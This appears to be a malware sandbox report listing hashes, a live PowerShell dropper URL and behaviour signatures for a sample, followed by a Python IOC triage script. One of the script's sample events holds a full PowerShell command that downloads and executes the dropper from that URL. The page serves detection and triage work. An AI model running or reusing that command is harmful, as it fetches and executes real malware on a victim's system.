General

  • Target

    1498a673c6789a18bea45e231b3f33cc.zip

  • Size

    799KB

  • Sample

    230516-jxfj9abh56

  • MD5

    2b357e67ad98ee7e81054e1c7c67cbc4

  • SHA1

    8aba17f7ec9994fd4c3e60ac0a397b63810ab375

  • SHA256

    8267e9213af9ee45f0afb881ffa4a43f0b4f83c66e6ecd9265dacb0656a582b0

  • SHA512

    df8f084c74c58acbd1e77da0131f9d65ee7f53dbd877db4ece90150e377c9c9b64518ef6599b0c57498995b9adb0465642421605d9dc39d638f36dd7c41c81b8

  • SSDEEP

    24576:EnGHCl0deJ05X+tnTmd5/eaHuP098D/G/PY0tb6:cG/AJ0Z+t85eaHuPq8cYCb6

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper: http://172.174.176.153/dll/new_rump_vb.net.txt

Targets

    • Target

      1498a673c6789a18bea45e231b3f33cc

    • Size

      805KB

    • MD5

      1498a673c6789a18bea45e231b3f33cc

    • SHA1

      aba3fe52930cd671a73eebe8cf7e4b2f693a2137

    • SHA256

      26c75f92dfbba046c472343b64987a309042e9e86c9393f46fb0d3cbe1ed38dd

    • SHA512

      b1e237285263029c8dab4fa3f7f8a3fefd351d51c69857a32ca33950d5af432fc23d49835f65da6e23c5b0cc3aa0b558f08b2bf0cb0f72f766e43aa9baf78a43

    • SSDEEP

      12288:8hxaTmOW1C+7D9qUclk8n1eKsvikcnKVJUpbvfoPPUuDuqu39yBhglPnu:8hH1CEDuLs6k20Ulvf4Uufuty2m

    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in System32 directory
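The following Python script is an added example and is not part of the sandbox report. It turns the indicators above (the file hashes of the submitted archive and its inner target, and the ps1.dropper URL) into an offline triage check, and reproduces the report's "Blocklisted process makes network request" signature over process events. The set of blocklisted process names, the event field names (`image`, `cmdline`, `dest_ip`) and the sample events are constructed assumptions, not data from the report.

```python
"""Offline IOC check for the sample described on this page.

Added example, not part of the sandbox report. The hashes and the dropper
URL are taken from the report; BLOCKLISTED_PROCESSES, the event schema and
SAMPLE_EVENTS are constructed assumptions for demonstration.
"""
import hashlib
from pathlib import PureWindowsPath

# Indicators from the report's extracted malware config.
DROPPER_URL = "http://172.174.176.153/dll/new_rump_vb.net.txt"
DROPPER_HOST = "172.174.176.153"

# "alg:hexdigest" -> target name, copied from the report's hash tables.
KNOWN_HASHES = {
    # submitted archive
    "md5:2b357e67ad98ee7e81054e1c7c67cbc4": "1498a673c6789a18bea45e231b3f33cc.zip",
    "sha1:8aba17f7ec9994fd4c3e60ac0a397b63810ab375": "1498a673c6789a18bea45e231b3f33cc.zip",
    "sha256:8267e9213af9ee45f0afb881ffa4a43f0b4f83c66e6ecd9265dacb0656a582b0": "1498a673c6789a18bea45e231b3f33cc.zip",
    # inner target
    "md5:1498a673c6789a18bea45e231b3f33cc": "1498a673c6789a18bea45e231b3f33cc",
    "sha1:aba3fe52930cd671a73eebe8cf7e4b2f693a2137": "1498a673c6789a18bea45e231b3f33cc",
    "sha256:26c75f92dfbba046c472343b64987a309042e9e86c9393f46fb0d3cbe1ed38dd": "1498a673c6789a18bea45e231b3f33cc",
}

# Assumption: script hosts and LOLBins whose outbound traffic we treat as
# a "blocklisted process makes network request" hit.
BLOCKLISTED_PROCESSES = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "regsvr32.exe", "rundll32.exe",
}


def digests(data: bytes) -> dict:
    """MD5, SHA1 and SHA256 of a byte string, keyed by algorithm name."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def lookup(data: bytes):
    """Return the report's target name if any digest matches, else None."""
    for alg, hexdigest in digests(data).items():
        hit = KNOWN_HASHES.get(f"{alg}:{hexdigest}")
        if hit:
            return hit
    return None


def lookup_file(path: str):
    """Hash a file on disk and look it up (samples here are under 1 MB)."""
    with open(path, "rb") as fh:
        return lookup(fh.read())


def triage_event(event: dict) -> set:
    """Return the set of reasons a process event is flagged; empty = clean.

    event: {"image": full path, "cmdline": str, "dest_ip": str or None}
    """
    reasons = set()
    image = PureWindowsPath(event.get("image", "")).name.lower()
    cmdline = event.get("cmdline", "")
    dest_ip = event.get("dest_ip")

    if image in BLOCKLISTED_PROCESSES and dest_ip:
        reasons.add("blocklisted_process_network_request")
    if dest_ip == DROPPER_HOST or DROPPER_HOST in cmdline:
        reasons.add("contacts_dropper_host")
    if DROPPER_URL in cmdline:
        reasons.add("fetches_ps1_dropper_url")
    return reasons


# Constructed sample events (not from the report): a dropper-style
# PowerShell launch, a browser hitting the same host, and benign PowerShell.
SAMPLE_EVENTS = [
    {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt')\"",
        "dest_ip": "172.174.176.153",
    },
    {
        "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "cmdline": "firefox.exe",
        "dest_ip": "172.174.176.153",
    },
    {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -Command Get-ChildItem",
        "dest_ip": None,
    },
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(PureWindowsPath(ev["image"]).name, sorted(triage_event(ev)))
```

Run the script as-is to see the three sample events scored, or call `lookup_file("suspect.zip")` against a quarantined file to confirm whether it is the archive or inner target the report describes; only the hash tables and the dropper URL are authoritative, the rest is illustrative.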

MITRE ATT&CK Enterprise v6

Tasks